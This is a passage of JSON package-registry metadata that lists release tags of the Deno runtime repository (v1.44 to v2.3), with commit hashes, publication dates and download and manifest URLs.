repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16